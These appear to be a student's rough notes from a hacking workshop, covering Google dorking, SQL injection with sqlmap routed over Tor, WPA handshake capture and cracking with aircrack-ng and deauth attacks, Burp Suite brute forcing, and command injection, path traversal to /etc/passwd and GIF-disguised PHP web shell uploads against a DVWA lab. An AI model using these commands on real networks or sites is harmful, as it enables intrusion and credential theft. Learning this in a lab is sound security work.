##################################################
He's using brave browser

##################################################

email pwned check
havebeenpwned.com

##################################################

not so known opensource repository platforms like github:
pastebin
binbucket

##################################################

keyloggers

##################################################

tor

##################################################

1031 he's using tor browser to access darknet

##################################################
tld: top level domain	 eg. .com
.onion

##################################################
facebookcorewwwi.onion


##################################################
privacy and data theft
-
##################################################

the actual stuff starts at 1139

intro about sql at 1139

talking about sql injection 1141

manas : whois.domaintools.com

site.gov.in filetype pdf

site.gov.in inurl:  php

cheat sheets for google advance search

takling about live hacking for a specific website

he's using sublime

talking about url's

generic url:
protocol://website.tld/directory/subdirectory/page1.aspx
?: seperates address from url
bm:bookmark
protocol://website.tld/directory/subdirectory/page1.aspx?name=pict&address=pune.......#bm

we're gng to change the parameters

web-hack

actual work

actual		:select * from some database.table where ud = '56' & id='51';
modified	:select * from some database.table where ud = '56' & id='51'';

TALKING ABOUT SQL INJECTION

BOOLEAN
TIME-BASED
blind based

doing on boolean

socks5 machine to machine comm
-u url



-dbs databases

##################################################

tor sqlmap --tor --tor-type=socks5 -u 'url' --check-tor -dbs

tor sqlmap --tor --tor-type=socks5 -u 'url' --check-tor -dbs

#all using sqlmap

##################################################
his terminal

'zsh':terminal

our is basic bash terminal

advantages: suggestions, syntaxes

"/I SHOULD USE ZSH!!!!!!!!"

##################################################

******Wifi-hacking********

talking about dhcp and beacon frames at 1221
talking abour aircrack airmon airreplay

sudo airmon-ng check kill 

station mode
monitor mode
sniffing

wireless interface card

airmon-ng start wlp6s0

wireless interface card name changed

root@imsahil:~# sudo airodump-ng wlan0

channels

limitation on channels in particular country

psk:preshared key

PBKDF2 is used for wpsk for 4096 times

use bsid

sudo airodump-ng --bssid '' -c 'channel no' -w 'filename' wlan0

sudo airodump-ng --bssid  08:25:25:2A:61:5F -c 13 -w file wlan0

-c channel
-w writing a file
#we are hacking block of data to find the password
#not just password but the whole data which has been transfered

pastel monitoring

deauthorizing:
when reconnecting it takes the wpa handshake

aireplay-ng --deauth 0 -a 'BSID' wlp6s0mon

rainbow tables

cracking:

aircrack-ng -w listA Soham01.cap

##################################################

talking about passwords

red teaming and blue teaming

wifi doesnt works after monitor mode
airmon-ng stop wlps0mon

and then restart network service

##################################################
Setting up environment
##################################################
1) Docker
--------------------------------------------------
used for booting in some images
use and flush ;) simple as it!!!!
alternative for vm

using it:

root@imsahil:~# service apache2 stop

root@imsahil:~# docker run --rm -it -p 80:80 sagikazarmark/dvwa
it:interactive
-p:port

if doesnt works then restart the docker service

go to the ip given in browser
1.
id : admin
pass: password

2.
create

3.
again login

4.
then go to burpsuite

5.
next
6.
next

7.
burpsuite:

8.
brute-force

9.
login

10.
security:
impossible
11.
set to low
we are trying brute force

12.
burpsuite:
intercept : off

13.
then insert login credentials:
14.
then turn intercept: on
15.
check the request on burpsuite

right click
send to intruder
send to repeater

change parameters
click on go
check page
click on render
click to render page
see rendered page

check intruder
target
host is server
psoitions shows vulnerability

buttons
clear to clear the automatic detected vulnerabilties

attack type: cluster bomb : two or multiple targets and multiple dictionaries
sniper: 1 target attack 1 dictionary
batterig ram: multiple dictionary one target
pitch fork: multiple target multiple dictionaries

select cluster bomb:
select from right button add
to username and password it will be enclosed by ampersand

payload:
dictionary to be sent
sending anything to target is payload
payload set: 1:for uname
set 2: for pass
payload type: simple list

add words below//for testing ofcourse
(we can load a file too!!)


options tab:
add the error message 'Username and/or password incorrect.' in grep match	

start attack


the correct credentials will not be checked

go to response and render
render the page

done with burpsuite!!!!


##################################################

Command Injection:
ping: give an ip
but after adding semicolon or pipeline we can use any command
like cat passwd or any linux commands

# he said about nc command

##################################################

CSRF skipped

##################################################

File Inclusion:

http://172.17.0.2/vulnerabilities/fi/?page=file1.php
http://172.17.0.2/vulnerabilities/fi/?page=file2.php
http://172.17.0.2/vulnerabilities/fi/?page=file3.php

http://172.17.0.2/vulnerabilities/fi/?page=../../index.php

http://172.17.0.2/vulnerabilities/fi/?page=../../../../../../../../../../etc/passwd
#../will be neglected if in home

we are exploiting te page navigation show a file 
which is not intended to be there
##################################################

File upload:

r57 shell
c99 shell

file check :
:-extension
:-image-content
:-

#talked about netcraft & whois
#every gif is gif98a or gif89
ENTER GIF 89 AT BEGINNING OF PHP FILE

upload a shell as a file
/hackable/uploads/shell.php

use url

then we can use any command on that url
//////script issues :(
##################################################
SQL INJECTION!!

sqlmap -u 'http://172.17.0.2/vulnerabilities/sqli/?id=&Submit=Submit'


##################################################

contact@vigiledge.com
linkedin:vigiledge

+91-6262151513
